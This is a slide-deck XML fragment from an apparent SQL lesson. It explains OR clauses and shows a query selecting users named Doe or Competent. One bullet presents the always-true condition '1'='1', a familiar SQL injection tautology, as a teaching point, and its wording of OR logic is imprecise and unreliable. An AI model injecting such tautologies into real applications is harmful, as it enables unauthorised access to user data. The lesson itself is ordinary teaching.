                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>John Doe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> clause says: Do not return a result if this condition is false. Since </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>'1'='1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> is always true, it doesn't change the result.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>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8" name="Shape 1078"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1079" name="Google Shape;1079;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Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1080" name="Google Shape;1080;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="724071"/>
            <a:ext cx="9144000" cy="344700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>2. Select all users whose last name is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Doe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Competent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a: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4" name="Shape 1084"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Google Shape;1085;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Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086" name="Google Shape;1086;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="724071"/>
            <a:ext cx="9144000" cy="344700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>2. Select all users whose last name is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Doe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Competent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2722735"/>
            <a:ext cx="9144000" cy="1166100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This query retrieves </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>John</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Doe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Bob Competent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> because the query is searching for all true cases of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1088" name="Google Shape;1088;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396400" y="1212050"/>
            <a:ext cx="8030400" cy="1367400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM site_data.users WHERE last='Doe' OR last='Competent'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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